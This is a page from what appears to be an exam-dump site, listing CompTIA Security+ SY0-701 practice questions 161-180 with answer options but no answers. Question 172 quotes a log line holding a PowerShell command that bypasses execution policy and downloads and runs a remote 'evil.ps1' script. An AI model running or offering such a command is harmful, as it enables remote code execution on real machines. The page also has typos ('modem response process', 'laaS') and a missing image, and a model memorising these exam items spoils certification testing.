Summer Certification Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: force70

Pass the CompTIA CompTIA Security+ SY0-701 Questions and answers with CertsForce

Viewing page 9 out of 14 pages
Viewing questions 161-180 out of questions
Questions # 161:

Which of the following actions best addresses a vulnerability found on a company ' s web server?

Options:

A.

Patching


B.

Segmentation


C.

Decommissioning


D.

Monitoring


Expert Solution
Questions # 162:

Which of the following is most likely to be used as a just-in-time reference document within a security operations center?

Options:

A.

Change management policy


B.

Risk profile


C.

Playbook


D.

SIEM profile


Expert Solution
Questions # 163:

A company wants to improve the availability of its application with a solution that requires minimal effort in the event a server needs to be replaced or added. Which of the following would be the best solution to meet these objectives?

Options:

A.

Load balancing


B.

Fault tolerance


C.

Proxy servers


D.

Replication


Expert Solution
Questions # 164:

After completing an annual external penetration test, a company receives the following guidance:

Decommission two unused web servers currently exposed to the internet.

Close 18 open and unused ports found on their existing production web servers.

Remove company email addresses and contact info from public domain registration records.

Which of the following does this represent?

Options:

A.

Attack surface reduction


B.

Vulnerability assessment


C.

Tabletop exercise


D.

Business impact analysis


Expert Solution
Questions # 165:

Which of the following is the final step of the modem response process?

Options:

A.

Lessons learned


B.

Eradication


C.

Containment


D.

Recovery


Expert Solution
Questions # 166:

A company wants to track modifications to the code used to build new virtual servers. Which of the following will the company most likely deploy?

Options:

A.

Change management ticketing system


B.

Behavioral analyzer


C.

Collaboration platform


D.

Version control tool


Expert Solution
Questions # 167:

A security administrator ' s account accesses company IT systems from an airport. Shortly after, the administrator ' s manager asks about critical configuration changes made by the administrator ' s account. The administrator was not aware of these changes. Which of the following attack methods did the attacker most likely use?

Options:

A.

Rogue access point


B.

Shoulder surfing


C.

Skimming


D.

Keylogger


Expert Solution
Questions # 168:

Which of the following security control types indicates the use of application firewalls and network firewalls?

Options:

A.

Deterrent


B.

Preventive


C.

Administrative


D.

Physical


Expert Solution
Questions # 169:

An organization maintains intellectual property that it wants to protect. Which of the following concepts would be most beneficial to add to the company ' s security awareness training program?

Options:

A.

Insider threat detection


B.

Simulated threats


C.

Phishing awareness


D.

Business continuity planning


Expert Solution
Questions # 170:

A security analyst is evaluating a SaaS application that the human resources department would like to implement. The analyst requests a SOC 2 report from the SaaS vendor. Which of the following processes is the analyst most likely conducting?

Options:

A.

Internal audit


B.

Penetration testing


C.

Attestation


D.

Due diligence


Expert Solution
Questions # 171:

Which of the following practices would be best to prevent an insider from introducing malicious code into a company’s development process?

Options:

A.

Code scanning for vulnerabilities


B.

Open-source component usage


C.

Quality assurance testing


D.

Peer review and approval


Expert Solution
Questions # 172:

A security analyst reviews the following endpoint log:

powershell -exec bypass -Command " IEX (New-Object Net.WebClient).DownloadString(http://176.30.40.50/evil.ps1 " )

Which of the following logs will help confirm an established connection to IP address 176.30.40.50?

Options:

A.

System event logs


B.

EDR logs


C.

Firewall logs


D.

Application logs


Expert Solution
Questions # 173:

Which of the following architecture models ensures that critical systems are physically isolated from the network to prevent access from users with remote access privileges?

Options:

A.

Segmentation


B.

Virtualized


C.

Air-gapped


D.

Serverless


Expert Solution
Questions # 174:

A security analyst is investigating an alert that was produced by endpoint protection software. The analyst determines this event was a false positive triggered by an employee who attempted to download a file. Which of the following is the most likely reason the download was blocked?

Options:

A.

A misconfiguration in the endpoint protection software


B.

A zero-day vulnerability in the file


C.

A supply chain attack on the endpoint protection vendor


D.

Incorrect file permissions


Expert Solution
Questions # 175:

A company wants to use new Wi-Fi-enabled environmental sensors to automatically collect metrics. Which of the following will the security team most likely do?

Options:

A.

Add the sensor software to the risk register.


B.

Create a VLAN for the sensors.


C.

Physically air gap the sensors.


D.

Configure TLS 1.2 on all sensors.


Expert Solution
Questions # 176:

While considering the organization ' s cloud-adoption strategy, the Chief Information Security Officer sets a goal to outsource patching of firmware, operating systems, and applications to the chosen cloud vendor. Which of the following best meets this goal?

Options:

A.

Community cloud


B.

PaaS


C.

Containerization


D.

Private cloud


E.

SaaS


F.

laaS


Expert Solution
Questions # 177:

A systems administrator works for a local hospital and needs to ensure patient data is protected and secure. Which of the following data classifications should be used to secure patient data?

Options:

A.

Private


B.

Critical


C.

Sensitive


D.

Public


Expert Solution
Questions # 178:

A security administrator observed the following in a web server log while investigating an incident:

Question # 178

Which of the following attacks did the security administrator most likely see?

Options:

A.

Privilege escalation


B.

Credential replay


C.

Brute force


D.

Directory traversal


Expert Solution
Questions # 179:

A security analyst is monitoring logs from the organization ' s SIEM and identifies logs related to one of their salespeople:

Time | IP address | Location | EmpID | App | Status

14:02 | 72.45.38.27 | Atlanta | 25687 | VPN | Success

14:04 | 72.45.38.27 | Atlanta | 25687 | Email | Failure

14:07 | 58.67.47.48 | Beijing | 25687 | VPN | Success

14:15 | 72.45.38.27 | Atlanta | 25687 | Teams | Success

Which of the following is being displayed in the logs?

Options:

A.

Impossible travel


B.

SMTP replay


C.

Directory traversal


D.

Cross-site request forgery


Expert Solution
Questions # 180:

Which of the following would enable a data center to remain operational through a multiday power outage?

Options:

A.

Generator


B.

Uninterruptible power supply


C.

Replication


D.

Parallel processing


Expert Solution
Viewing page 9 out of 14 pages
Viewing questions 161-180 out of questions